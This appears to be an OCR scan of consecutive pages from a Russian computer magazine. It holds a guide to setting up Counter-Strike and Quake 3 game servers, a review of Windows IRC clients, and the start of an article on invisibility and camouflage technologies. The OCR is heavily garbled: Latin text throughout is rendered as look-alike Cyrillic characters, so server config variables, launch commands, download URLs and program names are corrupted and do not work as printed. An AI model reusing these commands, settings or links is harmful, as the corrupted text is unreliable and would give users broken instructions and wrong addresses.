вер так, как ему кажется правильным. Одна- 



ко считаю нужным ознакомить тебя с наст- 
ройками, которыми руководствуется самая 
престижная, на мой взгляд, киберспортивная 
лига СРІ_ - СуЬег РгоТеззіопаІ І_еадие. Доста- 
точно сказать, что призовой фонд их чемпи- 
онатов составляет $100 000 - 150 000, поэ- 
тому так сложилось, что настройки этой лиги 
считаются стандартом де-факто, но выбор 
всегда за тобой. Все настройки необходимо 
поместить в файл зегѵег.сТд, находящийся в 
папке сзігіке. 



Конфигурация С5-сервера 



тр_аиіокіск О 
тр_аиІосго55Ііаіг О 
тр_аиіоіеатЬаІапсе О 
тр_Ьиуііте.25 
тр_соп$і$іепсу 1 
тр_с4іітег 35 
тр_ШоЫаск 1 
тр_УІ(1атаде О 
тр_МідІіі 1 
тр_(огсесатега 3 
тр_(гіеп(1ІуПге 1 
тр^ееіеііте 15 
тр_(гадІітіі О 
тр_ііо$іадерепаІіу О 
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ЗОМУТИ СВОЙ ГЕЙМ-СЕРВПК! 



тр_Ііті№ат$ 6 
тр_ІодШе 1 
тр_Іодтеззадез 1 
тр_Іод(1е1аіІ 3 
тр_тахгоипс!з 15 
тр_рІауегі(і О 
тр_гоипсШте 1.75 
тр_зЕаг1топеу 800 
тр_1ітеІітИ: 999 
тр_ІкрипізІі О 
тр_ѵѵіпІітИ; О 
зѵ_аіт О 

зѵ_аігассеІега!е 10 
зѵ_аігтоѵе 1 
зѵ_аІІоѵѵ(1оѵѵпІоа(1 0 
зѵ_сІіепіігасе 1.0 
$ѵ_сІірто(1е О 
зѵ_аІІоѵѵирІоа(1 0 
$ѵ_сііеаі$ О 
зѵ_дгаѵі!у 800 
зѵ_тахга1е 25000 
зѵ_тах$рее(1 320 
зѵ_тахир(1а1ега1е 101 
зуз_Еісга1е 10000 
(ІесаІЕгедиепсу 60 
раизаЫе О 
Іод оп 

(іесаіі'гедиепсу 60 
ейдеШіоп 2 
ІіозУгатегаіе О 



Л СТОВИИ И08ТЕ0И ПОД 

НІВВ0Ѵ8 и иш 



Какой же софт нам потребуется для того, 
чтобы полностью вооружиться и приступить к 
установке? А потребуется нам всего ничего - 
архив самого сервера. Под ѴѴіпсІоѵѵз тащим 
софт с итІіІе$расе.ги/6ате$/Соипіег-5ігіке%201.6/по$- 
Іеат/с$16УІ_ѵ13.ехе.МпІ, а пингвинская версия 
находится здесь: ГСр://с$.тедаІод.ги/с$_$егѵег/ 
ІіІ(1$_Ііпих_с$ігіке_(иІІ_270904.іаг.д2. 

После того как скачаешь архив, можно прис- 
тупать к самой установке и настройке. Итак, 
начнем! Распаковываем архив с сервером в 
нашу рабочую папку. В винде по дефолту это 
Ызегѵег, а в линуксе обычно ЫсІ5_І. Создаем 
строку запуска для Ысіз.ехе, которая для фор- 
точек будет выглядеть примерно так: 



Мз.ехе -дате сзігіке -потазіег -іпзесиге +зѵ_1ап 1 
♦тарсІіапдесЕдЕіІе "зегѵег.сЕд" +тахрІауег$ 11 +тар 
( 1 е_а 2 іес 



А для никсов так: 

,/!іІ(1$_гип -дате сзігіке -потазіег -іпзесиге +зѵ_Іап 1 
♦тарсІіапдесЕдЕіІе "зегѵег.сЕд" -ріпдЬоозІ 2 +тахрІауегз 11 
+ тар (1е_агіес 

Наиболее непонятные параметры я поясню: 
РіпдЬоозІ - параметр присутствует только в 
линуксовой версии сервера. Это встроенный 
бустер, он нужен для уменьшения латентнос- 
ти (пинга). Возможны параметры от 1 до 3. 
Чем больше значение переменной, тем мень- 
ше задержки, но и выше нагрузка на сервер. 
В ѴѴіпсІоѵѵз тоже имеется аналог такого бусте- 
ра, называющийся МЬоозІег, но он поставля- 
ется в виде отдельного плагина. 

Іпзесиге - параметр, отключающий встроен- 
ный античит-модуль от Ѵаіѵе. Если ты юза- 
ешь сервер позіеат, то этот модуль жела- 
тельно вырубить, так как он работает только 
на официальных серверах и его наличие 
лишь даст дополнительную нагрузку процес- 
сору. В качестве античита для позіеат-сер- 



веров можно использовать СІіеайпд-ОеаМі 
или НІдиагсІ. 

Не забывай постоянно обновлять свой серв 
последними вышедшими патчами. Для 
всех настроек в папке с:\Мзегѵег\с5Ігіке 
предусмотрен специальный конфиг 
зегѵег. с7д, посредством которого и настра- 
ивается сервер. Он будет загружаться, как 
только ты запустишь сервер, а также при 
каждой смене карты. 

Л СТОВИИ 8ТЕПМ ПОД ѴШ00Ш8 

и ииііх 

Здесь уже потребуется аккаунт в зіеат’е или 
же еще не использованный ключ от НаІМйе. 
Напомню, что клиент можно скачать с офици- 
ального сайта. 

О ѴѴіпсІоѵѵз 

Надеюсь, у тебя уже есть аккаунт в зіеат’е и ты 
готов приступить к установке сервера. Сам сер- 
вант можно бесплатно выкачать через платфор- 
му зіеат с помощью специальной утилиты 
ЫсІзирсІаМооІ (шѵѵ.зіеатроѵѵегесі.сот/ 
(1оѵѵпІоа(1/ІіІсІ5_ирсШооІ.ехе). Эта утилита поддер- 
живает установку НЦ НІ_2 и всех ее модифика- 
ций, включая СЗ 1 .6 и сз:зоигсе. После ее за- 
пуска в консоли появится хелп, в котором под- 
робно расписано, как загрузить нужный для иг- 
ры мод. 

Есть еще и другой способ, непосредственно 
через сам зіеат: запускай зіеат.ехе и жди, 
пока скачается последнее обновление. После 
этого должно появиться меню зіеат’а. Выби- 
рай «РІау датез». Далее появится окошко со 
списком доступных закачек. Тебе потребует- 
ся только сіесіісаіесі зегѵег. После того как 
сольешь его, можешь смело запускать. Жми 
«ЗШ зегѵег». Вот и запустился сервер, пол- 
ностью готовый к работе. 

Что касается его настройки, то менять можно 
все, что нужно, прямо отсюда через 0111-меню, 
и не надо лезть за зегѵег.Уд. Очень удобно. 

О ипих 

Начнем с того, что скачаем зіеат. Я пользу- 
юсь ѵѵдеТом. Если у тебя его нет, то вполне 
можно использовать любую другую ІіНр/Йр- 
программу. Вот несколько ссылок, с которых 
можно слить архив: 

Шр://68.90.68.35Меат.іаг.д2 
Шр://іаріе.пІЙеатМеат.Іаг.д 2 
ІійрУДеІі 8 ІііІІі 0 Іе.пеІ/іаріеЫеап.Іаг.д 2 
В моем случае закачка архива на сервер бу- 
дет происходить при выполнении следующей 
команды: ѵѵдеі Шр://68.90.68.35/з4еат.4аг.д2. 
Теперь у нас есть все, что нужно. Распаковы- 
ваем то, что скачали, в нашу рабочую папку: 
\ах -іхѵі зіеатТаг.ді. Не забываем установить 
права на запуск: сМтосІ +х зіеат. Теперь нам 
осталось только запустить ./зіеат, и мы уви- 
дим что-то вроде 

СІіескіпд Ьооізігаррег ѵегзіоп... 
беШпд ѵегзіоп X о\ 5іеат НШ8 ІІрсІаІе ТооІ 
ОоѵѵпІоасІіпд 

5іеат Ипих СІіепі ирсІаЫ, ріеазе геігу Ше соттапб 

Если у тебя нет аккаунта в стиме, то самое 
время его создать: 

,/зіеат -соттапб сгеаіе -изегпате Ш -етаіі 
ІѴАРРЕТКОѴ.сот -раззѵѵогб хакег -диезііоп "хакер гиііг?" 
-апзѵѵег уеаіі 

После того как аккаунт создан, ты увидишь 
следующее: 



СІіескіпд ЬооЕзігаррег ѵегзіоп... 

Сгеаііпд Ассоипі 
АссоипЕ Сгеаіей зиссеззЕиІІу 

Аккаунт готов, теперь приступим к скачива- 
нию самого сервера: 

,/зЕеат -соттапс! иргіаіе -дате сзЕгіке -сііг 
/Іюте/іѵап/ІіІ(1з_І -изегпате Ш -раззѵѵогсі ѵапуизііа - 
гететЬег_раззѵѵогсІ. 

То же самое, но с точной формой 
заполнения: 



л На нашем диске 
ты найдешь все 
необходимое для 
поднятия своего 
игрового сервера. 



,/зЕеат -соттапсі сгеаЕе -изегпате <изегпате> -етаіі 
<етаіІ> -раззѵѵогсі <раззѵѵогс1> -диезііоп <диезЕіоп> -апзѵѵег 
<апзѵѵег>. 



ВететЬеграззѵѵогсІ в данном случае 
указывает на то, что тебе просто не при 
дется по 1 5 раз его вводить и он будет 
запомнен. 

После того как вся установка завершится, 
можно запускать сервер: 

.Шит -дате сзЕгіке +тар ( 1 е_а 2 Іес -аиіоирсіаіе 

Вот, собственно, и все, что касается серве- 
ров СоипЕег-ЗЕгіке. 




Запускаем сервер С5 



Л ТРЕТЬЯ КВОКО 

С ОиакеЗ все обстоит гораздо проще, 
нежели с СоипТег-ЗТгіке. Тут не потре- 
буется нигде регистрироваться и соз- 
давать ненужный тебе аккаунт. Здесь 
нужна только сама игра, желательно с 
последним патчем (на момент написа- 
ния статьи это 1 .32), и тот мод, кото- 
рый мы собираемся устанавливать на 
сервере (озр, срт). 

Смысла описывать все настройки опять-та- 
ки нет, потому что настройка - это дело 
тонкое и у каждого свои понятия насчет то- 
го, как должен быть сконфигурирован сер- 
вер. От себя же советую настроить сервер 
так, как настраивают его организаторы 
СІапВазе. Если ты обзавелся модом ОЗР, 
то в нем есть конфиг сервера для дуэль- 
ных игр, называющийся ІѵШд. Вот он и 
принят за дефолтовый. Ну а для тех, кто 
хочет настроить сервер самостоятельно, - 
создаем зегѵег.сід с настройками либо в 
папке ЬазецЗ, если сервер под оригиналь- 
ным циакеЗ, либо в папке ОЗР, если сер- 
вер под мод ОЗР. 




л Приобрести сер- 
вер, на котором ты 
потом запустишь 
свой игровой пор- 
тал, можно где 
угодно, например 
на том же 
шл/ѵ.іѵоузегѵег.ги. 

л Не используй пи- 
ратских версий 
софта - это уголов- 
но наказуемое за- 
нятие. Если хо- 
чешь, чтобы у тебя 
было все по уму, - 
раскошелься на 
лицензию. 
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Уже запущенный сервак третьей кваки 



А СТОВИН СЕРВЕР 03 ПОД «ІІПВОШЗ 

Как уже говорилось, потребуется сама игрушка с последним патчем. Созда- 
ем нашу рабочую папку с сервером, например цЗ-зеп/ег, и копируем туда иг- 
ру. Если собираемся устанавливать определенный мод, скажем, ОЗР, то он 
должен лежать в основной папке с игрой как обычная папка цЗ-зегѵег/озр. 
Далее оздаем ярлык к циакеЗ.ехе с параметрами +зеі бебісаіеб 2 +зеІ 
{з_дате озр +ехес зегѵег.сТд. В этом случае у нас запустится сервер с мо- 
дом ОЗР и с настройками, которые лежат здесь: дЗ-зегѵег/озр/зегѵег.сТд. 
Если ты собираешься ставить оригинальный сервер Оиаке III без всяких 
модов, то в этом случае ярлык будет выглядеть так: +зеІ бебісаіеб 2 
+ехес зегѵег.сТд, а файл с настройками в этом случае должен лежать 
здесь: дЗ-зегѵег/ЬазедЗ/зегѵег.с^д. 

А СТОВИН СЕРВЕР 03 ПОД ыник 

В случае с І_іпих нам будет необходим специальный сервер под него. За- 
бираем его здесь: Т1р.іс1$о^1:ѵѵаге.сот/іс1$1:иШдиакеЗ/Ііпих/ІіпихдЗароіпН.32Ь-3.х86.гип. На 
момент написания статьи это самая свежая версия, но лучше проверить 
папку (1р.ісІ$ойѵѵаге.сот/ісІ$іи(йиакеЗ/Ііпих/ на предмет нового билда. Опять же, 
распаковываем архив в нашу рабочую папку цЗбеб. Строка запуска для 
ОЗР-мода будет выглядеть так: /цЗ сЫ +зеі бебісаіеб2+зеі Тздате озр 
+ехес зегѵег.сТд. Зегѵег.сТд должен лежать в папке ОЗР. В случае с обыч- 
ной квакой без модов: /цЗбеб +зеі бебісаіеб 1 +ехес зегѵег.сТд. Зегѵег.сТд 
должен лежать в папке ЬазецЗ. 

А ЗЛОКЛЮЧЕНИЕ 

Видишь, поднять сервак для игрушек совсем не сложно. Но все то, что я 
описал в статье, - это лишь начальный уровень. Далее можно развить всю 
эту индустрию еще круче: прикрутить статистику для игроков, сделать мо- 
ниторинг мап на серверах и количества игроков на текущий момент и т.д. 
и т.п. Главное - желание! ЗС 



пзпчем это надо? 



Издавна игроки хотели выяснить, кто же из них 
сильнее. Но как это сделать, если в инет-кафе пос- 
тоянных посетителей 10-20 от силы, а в локалке ту- 
сят ламоботы? Интернет объединяет людей. Парни 
из разных городов и стран могут помериться сила- 
ми. На раскрученные серверы ежедневно заходят 
тысячи посетителей, среди которых есть и широко 
известные в узких кругах геймеров люди. Такие 
серверы участвуют в устроении соревнований, а 
это уже бизнес с неплохим доходом. Вот и думай 
после такого, надо тебе это или нет. Да и если ты 
просто админишь локалку, то игровой сервер не 
будет излишеством, потому что, играя на нем, твои 
юзеры перестанут нагонять внешний трафик :). 
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И днажды пеня спросил юноша-коппьютерщик: «Кто такой декадент?». Объяснять это понятие языком высоких сфер быпо не с руки. 
Пришла в голову лишь аналогия с чатами: декадент - человек, растрачивающий вреия, деньги и здоровье на треп в чатах. Однако делает 
он это всегда исключительно стильно. Как же ножно стильно транжирить свое вреия, сидя в веб-чатах? Это невозможно. ІНС (Іпіегпеі 
Неіау СЬаі) - единственно верный способ. Да и там нужны кое-какие потуги, чтобы выделиться из толпы. Например, трещать с пацанами, поль- 
зуясь лишь самым модным ІНС-кпиентом. Есть пи такой? О да, добрый десяток симпатичных Ніи-детищ будет скормлен данному обзору. 




И ДРУГИЕ пики продажной ЛЮБВИ в поток 



к. 




^ВЧЕМДЕКПДЕНТСТВОВПТЬ? 




ІВС столь же неразрывен с 
ІВС, сколь Алла Пугачева явля- 
ется неотъемлемой частью 
отечественной эстрады! В свое 
время я изменял данному 
гранду с менее известными 
коллегами по цеху. Клиент не 
умел держать коннект сразу с 



- - ЛЯ - - »м 

2 ^ Т 




несколькими сетями. За последние три года 
тиШ-соппесІ успешно реализован: я могу тол- 
каться на ЕРпеТ, ОАІлеІ и ОАІлеІги одновре- 
менно! Клиент был, по сути, единственным 
выбором ѵѵіп-юзера, склонного к ведению бое- 
вых действий на поприще ІПС. Для него были 
написаны десятки скриптов и плагинов, кото- 
рые обвешивали людей броней защиты и на- 
деляли острейшей бритвой для проведения 
беспощадных атак. ЬООЫ ік требовал, чтобы я 
обозрел скрипты ІМеога РгоТеззіопаІ и Мопзіег 
для данного клиента. Они дают не самые хи- 
лые возможности для реа- 
лизации обозначенной 
обороны и нападения. Ес- 
ли ІВС - стиль твоей жиз- 
ни, то обойти тІВС внима- 
нием будет непроститель- 
но. Последний апдейт воз- 
можностей ЗЗІ_ придется 
по вкусу любителям шиф- 
роваться. А вот последний 
апдейт с вымогательством 
$20 за регистрацию при- 
дется по вкусу лишь миро- 
вым империалистам. На- 
деюсь, что в новой, седь- 
мой версии обойдется без 
нежелательных сюрпризов. 





Занятная тенденция: большинство софтин ста- 
новится тяжелее мег за мегом год от года. 
Инсталлятор КІіепІ’а, наоборот, сдулся вдвое за 
прошедшие пару лет! Интерфейс же практи- 
чески не поменялся: обличив, вдохновленное 
ХР, претерпело лишь косметический ремонт. 
Если ты против излишней визуализации, то мо- 
жешь легко вернуть клиент в классический вид 
ѴѴіп95. В последней Ьеіа-версии есть поддерж- 
ка руНіоп-скриптов и пока мутной вещицы - 
ВиЬуЗсгірЕ Нововведения подружатся с уже 
имеющимися опциями скриптинга на ѴВА, 
^сгірі и РегГе. Лично я сам всегда был жаден 



зо 





КЛИЕНТЫ ТЕТУШКИ ИРИНЫ 



до траты времени на написание собственных 
скриптов, так что больше забурился в поиск 
фишек, полезных для конечного юзера. Мне 
понравился еще более развитый по%-лист, с 
помощью которого ты можешь мониторить нуж- 
ный ник, забивая в лог, когда и на сколько дол- 
го появлялась нужная рожа в ирке. Для ленив- 
цев из моего семейства по умолчанию было 
вписано немало фишек, характерных более раз- 
витым I ВС-скриптам: аиіо-аѵѵау, защита от тзд- 
и СТСР-флуда, а также встроенный зіііі-лист, 
который позволит автоматически изгонять неу- 
годных с подконтрольных каналов. 



і'ІВСіі г24 



№р://]1гс.Мск.огд 




Советский союз занимался поиском рыбы и 
колбасы. Создатели рВС смогли скрестить из- 
вестный консольный клиент с СИЛ. Название 
расшифровывается как ^ѵа-ІВСіі, что в пере- 
воде на понятный язык звучит так: ^ѵа-адап- 
тация легендарного *піх-клиента ІВСіі. Это оз- 
начает, что клиент совместим с десятками 
скриптов под обозначенный консольный про- 
дукт. Для долгоруких, длина чьих конечностей 
позволяет написание своих скриптов: вы смо- 
жете свернуть горы с помощью вшитого 
скрипт-языка ЗІеер, который покажется похо- 
жим на РегІ. Занятно, что скриптовый модуль 
обновляется независимо от основной базы 
клиента. Новые возможности для кодинга по- 
являются еженедельно. Я бы вообще мог из- 
менить тІВС’у с такой ореп зоигсе системой, 
если бы кодеры попарились и снарядили кли- 
ент Ргоху-поддержкой. 





Все становится более и более наглядным. За 
последний год ни один из моих собутыльников 
не купил мобилы без фотокамеры! Даже на 
ІВС нас теперь будут лишать привычной 
скромности текстового общения. ѴіВС соблаз- 
нит тебя возможностью устроения видеокон- 
ференций с коллегами-чатланами. Если све- 
жесть лица не вызывает желания его демон- 
стрировать, то можно ограничиться хриплыми 
стонами по встроенному голосовому селекто- 
ру. Когда дела совсем плохи, можно отдаться 
пересылке писем посредством встроенного 
мыльного клиента. Это просто матрешка в 
матрешке: здесь даже присутствует свой 



собственный Іеіпеі-клиент. Зачем нафиг нужен 
іеіпеі, когда все минимально серьезные маши- 
ны пускают тебя в свое чрево лишь по ЗЗН? 
Встроенная фишка оказывается ненужной, как 
и львиная доля всех остальных. Если мы уда- 
лим все имеющиеся приблуды, то останется 
довольно бедный и нестабильный продукт. 





Когда клиент только вышел в свет, в него по- 
вально влюбились все Оеірііі-кодеры. Тогда бы- 
ло в диковинку кодить ІВС-скрипты в разсаі- 
формате. Сейчас многое поменялось, в том 
числе и команда программеров, ответственная 
за Вегзігс-проект. Линейка 2* была целиком 
переписана совершенно новыми людьми с дру- 
гим складом ума. Появилась совместимость с 
*піх в его Х-ѵѵіп проявлении. Эта фишка может 
быть особенно полезна бисистемным юзерам, 
которые грешат интимной связью с Виндой и 
Линуксом одновременно. Ранее подобный ѵѵіп- 
*піх-клон ты мог увидеть лишь в виде Х-СНаТа, 
чья ѵѵіп-часть была сильно ограниченной. 

Вегзігс обладает приятным и в то же время бо- 
гатым интерфейсом, однако требует оплаты ре- 
сурсами твоего компа за предложенные краски. 




Авторы проги - смелые люди. Они раскатали 
губу аж на 20 баксов за юзание своего дети- 
ща. Наверно, в нем можно найти некие сме- 
лые начинания, за которые не грех отдать 
кровные IV. Например есть встроенный бот, 
который, однако, вряд ли рискнет конкуриро- 
вать с ѵѵіп-портом Еддбгор. С основной прогой 
поставляются фишки в стиле «выучи С++ за 
24 часа»: самопальный ѵѵеЬ-браузер, боѵѵп- 
ІоасІ -менеджер и МРЗ-плеер. Авторы прилади- 
ли и типичные скриптерские навороты: порт- 
сканер, аійо-рп, Ыаск- и йіепсі-листы. Созда- 
тели софтины завлекают предложением в духе 
«скачай нашу мега-тулзу и пойми, за что мы 
требуем двадцатку». Я могу быть непонятли- 
вым, но врубиться в такую странную причину 
запроса мне было не дано. 




Сомневаясь в объективности собственной 
оценки программ, я часто спрашиваю мнения 
у обычных юзеров. По теме ІРС каждый второй 




заявлял: «Все, вроде бы, ништяк, но НубгаІВС 
чуть лучше!». Прога написана на модном ѴізиаІ 
Зіисііо 7 с подключением ѴШуАИ. Она обеспе- 
чивает оперативную работу, а инсталлятор за- 
нимает сущие крохи. С последним билдом из 
клиента был вырван несимпатичный спам-мо- 
дуль, который постоянно кричал на каналах ІРС 
о том, каким клиентом ты пользуешься. Прогу 
можно конфигурировать через удобный интер- 
фейс либо правкой прилагающегося хті-фай- 
ла. Простые скрипты, идущие вместе с прогой, 
помогут сделать процесс кик-банов более за- 
нимательным: имена изгнанников будут выде- 
ляться цветом, они получат личные сообщения 
от тебя с пожеланиями вести себя хорошо. 





Чат для отморозков. Или же чат для клевых 
парней, если иначе прочитать слоган «ТМе Сбаі 
СооІ Реоріе ІІзе». Клиент появился не вчера, но 
интенсивного развития не наблюдается и по 
сей день. ІсеСНаІ является, скорее, экспери- 
ментальной штуковиной для разминки рук, что 
успешно затекли при использовании привыч- 
ного тІВС. Какой клиент еще не пытался зав- 
лечь тебя обещанием поддержки работы с 
несколькими сетями одновременно? Отморо- 
женный чат не исключение. Он умеет работать 
параллельно с десятью сервантами. Приятная 
особенность клиента образуется человеческим 
фактором, ибо кодеров проекта можно почти 
постоянно застать на просторах ІРС, поделить- 
ся с ними впечатлениями и пожеланиями на 
тему клиента. Интерфейс получился довольно 
пестрым, но в то же время не напрягающим 
глаз и позволяющим рулить всем сложным 
процессом чаттинга без шума и пыли! 

Л ДЕПОЕМ ВЫВОДЫ, Г0СП0Д0! 

Ну вот и все. После такого глубокого и беспри- 
страстного обзора тебе, я думаю, остается 
лишь сделать выбор в пользу того или иного 
клиента. Выбор будет зависеть от тебя самого: 
от твоих предпочтений, возможностей и нужд. 
Понимаю, что в Сети лежит еще очень много 
ІНС-клиентов, но, думаю, я предложил тебе 
самые достойные из всех. Зачем покупать за- 
порожец, если есть деньги на мерседес, пра- 
вильно? Удачи тебе, друг, в покорении кибер- 
чат-пространства! зс 



ЧЕЕ> 

л На блестящих 
кружочках, что ты 
получил вместе с 
журналом, ты, если 
постараешься, най- 
дешь все перечис- 
ленные клиенты. 
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казочная шапка-невидимка, «Неповек-невидиика» Кэппса, кольцо Топкиена, гоппивудский «Хищник», глаз инвизибипити в аське... В 
этой логическом ряду заключена неуемная тяга человечества к невидимости. Невидимость была и остается слишком соблазнительной 
для военных и шпионских ведомств, чтобы они так просто оставили ее сказочникам и фантастам, не воплотив технологию в жизнь. По- 
ка биологи делают прозрачными и без того мелких грызунов, инженеры успешно решают задачки с неживыми объектами - от невидимых чер- 
нил до плащей, самолетов и зданий-невидимок. О там, где наука пока еще бессильна, в ход идет хитрость или прямое надувательство. 

ТЕХНОЛОГИИ НЕВИДИМОСТИ 



С начала определимся, о чем 
вообще речь и зачем все это 
нужно. Самые очевидные цели 
- военные. Шпионы, развед- 
чики, диверсанты, войска и 
техника, будучи невидимыми, 
смогут проникать в глубокие 
тылы противника и, соответ- 
ственно, шпионить, разведывать, вредить и 
наносить внезапные удары по изумленному 
врагу. Однако, если и враг окажется не ме- 
нее продвинут в технологиях невидимости, 
обнаружить секретные штабы и склады с 
оружием не представится возможным, пото- 
му что вражеские здания, в свою очередь, 
будут невидимыми. Попасть в невидимого 

л Узнай больше о 
стелс-технологиях: 
ѵѵѵѵѵѵ.ІоѵѵоЬзегѵ- 
аЫе.сот 






солдата тоже станет весьма затруднительно. 
Вот это война! Невидимые войска носятся по 
тылам и линии фронта, не замечая друг дру- 
га. Над ними кружат самолеты-невидимки, 
шмаляя напропалую по невидимым целям... 

Сомневаться в полезности технологий не- 
видимости в мирной жизни не приходится. 

С невидимыми зданиями и архитектурными 
сооружениями можно не париться в отноше- 
нии дизайна - урбанистический пейзаж не 
будет портить вид из твоего окна. В медици- 
не, если сделать нужные участки тела чело- 
века прозрачными, врачи смогут непосред- 
ственно наблюдать, что творится внутри па- 
циента, не прибегая к помощи рентгенов, 
томографов и прочих ультразвуков. 



Во всех вариантах военного и гражданско- 
го применения невидимости речь идет о 
восприятии объектов человеческим глазом - 
в оптическом диапазоне. По сути, можно вы- 
делить два вида невидимости: прозрачность 
и незаметность, или маскировку. В послед- 
нем случае ты не видишь, что находится по- 
зади объекта, но при этом не можешь выде- 
лить его на общем фоне. 

Итак, какие конкретно достижения есть 
на сегодняшний день? Секретные военные 
разработки ведутся, в частности, в лабора- 
тории МАЗА Ргориізіоп ЬаЬогаІогу и фи- 
нансируются пентагоновским ведомством 
ОАВРА. Об этом все знают, но толком ник- 
то ничего не видел (что может говорить о 
некоторых успехах в создании невидимости 
;-)). Пока человечество ждет новостей из 
таких секретных лабораторий, пресса вре- 
мя от времени балует «сенсациями» от ге- 
ниев-одиночек. 

А 3-3-3, БИОЛОГИЯ 

Прямыми последователями уэллсовского 
человека-невидимки Гриффина являются 
биологи, работающие над прозрачностью 
живых тканей. Основные идеи они заим- 
ствуют у природы. В животном мире приме- 
ров невидимости полно. Это не только ка- 



32 








ШППКП-НЕВИДИМКП 




Профессор Сусуми Таши демонстрирует плащ-неви- 
димку в действии 



муфляжники и имитаторы - хамелеоны, ось- 
миноги, палочники... Настоящей прозрач- 
ностью обладают, в основном, морские ор- 
ганизмы. Некоторые из них обитают на кило- 
метровой глубине - там, где кромешная 
тьма. Тела этих морских существ настолько 
тонкие, что просвечивают насквозь. С ребра 
они тоже неразличимы, как магнитофонная 
лента. Так неслабо плющит обитателей глу- 
бин чудовищное давление. 

Интерес для ученых представляет желати- 
нообразное вещество в организме всех проз- 
рачных морских существ. Именно оно отвеча- 
ет за прозрачность, имея коэффициент пре- 
ломления, близкий к воде. Этот же желатин 
обеспечивает животным плавучесть и защиту 
от давления. 

Достичь прозрачности под водой, конечно, 
проще, чем на воздухе. Однако у исследова- 




Принципы работы устройств оптического камуфляжа 



телей из Техасского университета в Остине 
под руководством доктора Эшли Уэлша в ав- 
густе 2000 года кое-что получилось. При по- 
мощи хитрого вещества на основе глицерина 
они сумели на короткое время сделать проз- 
рачным участок кожи лабораторной крысы. В 
течение 20 минут сквозь «окно» можно было 
созерцать подкожные ткани на глубине в нес- 
колько миллиметров. После этого несчастной 
крысе залезли под кожу и нарисовали там 
настроечную таблицу на манер телевизион- 
ной. Шприцом ввели раствор, и через некото- 
рое время можно было оценить четкость под- 




Такой шлем с проектором обеспечивает волшебный эф- 
фект плаща-невидимки 



кожного изображения. Ученые утверждают, 
что к моменту испытаний на людях они при- 
думают вариант с менее болезненным втира- 
нием «раствора невидимости». Химический 
состав препарата запатентован в Штатах. 

Итак, Уэллс предположил, а Уэлш доказал, 
что теоретически можно сделать живые тка- 
ни прозрачными. Но вот технически реали- 




Демонстрация на ѴѴігесі №хйе$і 2004. Лаборатория Та- 
ши - почетный гость любой выставки хай-тека 



зовать обработку, скажем, внутренних орга- 
нов пока весьма проблематично. Попробуй 
представить себе, например, втирание гли- 
церина в мозги... ;-). 

Кстати, в голливудских фильмах про неви- 
димок обнаруживаются существенные техни- 
ческие ляпы. Совершенно прозрачный чело- 
век сам не может ничего видеть! Ведь его 
хрусталик и сетчатка тоже прозрачные, а зна- 
чит, не преломляют свет, не фокусируют кар- 
тинку и не преобразуют ее в нервные импуль- 
сы. Природные невидимки сталкиваются с 
аналогичной трудностью. Подводные живот- 
ные, имеющие зрение, при всей своей неви- 
димости не могут иметь прозрачные зрачки и 
сетчатку, иначе они сами ничего не увидят. 
Обитатели морских глубин практикуют нес- 
колько подходов к решению этой проблемы. 
Первый способ - «перископ» - для дезориен- 
тации хищников (или жертв) глаза выносятся 
из тела на длинных ножках. Второй вариант - 
«оптоволокно» - очень маленькая сетчатка, 
собирающая свет по специальным органичес- 
ким световодам. Другой, противоположный, - 
«бледные глаза». Глаза у таких существ очень 
большие с большой сетчаткой, собирающей 
достаточно света, чтобы видеть, но при этом 
очень тонкой и почти прозрачной. Человек 
давно дотумкал использовать все эти перис- 
копы и эндоскопы для того, чтобы подгляды- 
вать и заглядывать поглубже. 

Л ОТОЙДИ, ТЫ НЕ СТЕКЛЯННЫЙ 

Да-а, видно, биологи еще не совсем готовы 
втереть нам что-нибудь для невидимости. 
Реалистичные надежды сулит инженерная 
мысль. Без издевательств над родимым те- 
лом можно просто надеть специальный кос- 
тюм или спрятаться в танк-невидимку. 

Пару лет назад мир облетела «сенсация» 
об изобретении в Японии (ох уж эти японцы!) 
плаща-невидимки. На страницах уважаемых 
изданий красовались снимки профессора Су- 
суми Таши в своем чудесном плаще на фоне 
оживленных улиц. Выглядело это весьма эф- 
фектно, но по сути оказалось, скорее, фоку- 
сом в духе Копперфильда. Однако и сам про- 
фессор не скрывал детали технологии. Дос- 
таточно было покопаться в описаниях на сай- 
те Токийского университета 
(Шр://рго}есМагіи- 

іокуо.ас.Ір/ргоіесІз/МЕОІА/хѵ/ос.ИІтІ). В общем приб- 
лижении это похоже на ситуацию, когда че- 
ловек оказывается на фоне экрана в луче ки- 
нопроектора. Хитрость состояла в том, чтобы 
отображать на плаще кусок реального вида, 
который в данный момент загораживается от 
наблюдателя. При этом псевдопрозрачность 
наблюдается с различных ракурсов, а проек- 
тор располагается на голове (шлеме) наблю- 



«ЧЕПОВЕК-НЕВИДИМКП» ГЕРБЕРТ0 93ППСЯ 



Научный подход к проблеме невидимости был впервые проде- 
монстрирован более ста лет назад в романе «Человек-неви- 
димка» Уэллса. Сие бессмертное творение до сих пор являет- 
ся настольной книгой любителей и гуру невидимости. Способы 
достижения невидимости живого тела по Уэллсу даже спустя 
время не выглядят столь уж наивными, а описание сопутству- 
ющих физиологических деталей представляет собой настоя- 
щий научный отчет! Психиатрические нюансы с идеями сверх- 
человека тоже выглядят убедительно и могут помочь будущим 
невидимкам не свихнуться. 




л Роман Герберта 
Уэллса «Человек-не- 
видимка», ставший 
настольной книгой 
по невидимости 
ІіНр://ІіЬ.ги/ 
Ш0РАМТ/ІІЕІ.З/ІПѴІ5- 
іЫ.Іхі 




а Читай о попытках 
запатентовать, в 
общем-то, лежа- 
щие на поверхнос- 
ти идеи невиди- 
мости: 

ѵѵил/ѵ.сЬатеІео.пеІ/ 

пеѵѵз.МтІ 
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л Рецепты простых 
в изготовлении 
симпатических (не- 
видимых) чернил: 
Шр://сНетѵѵогІсІ.п 
агосі.ги/ргасііс/зіт- 
раШтІ 




Танк, закрытый «невидимыми» панелями. Одна из первых 
разработок адаптивного камуфляжа в лаборатории № 
Ргориізіоп ІіЬогаіогу (ША) 



ем концепции классического камуфляжа. В 
терминологии военных ученых это так и на- 
зывается - адаптивный камуфляж. В век 
миниатюрной электроники и оптоволокна 
реализация в общих чертах выглядит так. 
Маскируемый объект со всех сторон напич- 
кан микрокамерами, которые передают 
картинку на противоположную сторону и 
там ее отображают. В итоге получается 
что-то вроде Хищника из одноименного 
фильма. В военных лабораториях Пентаго- 
на на полном серьезе разрабатывают по- 
добные системы камуфляжа техники и не- 
подвижных строений. 

В ход идут самые современные техно- 
штучки: микрокамеры с волноводами, дисп- 




УІііта Опііпе. Лицом к лицу с невидимым врагом 



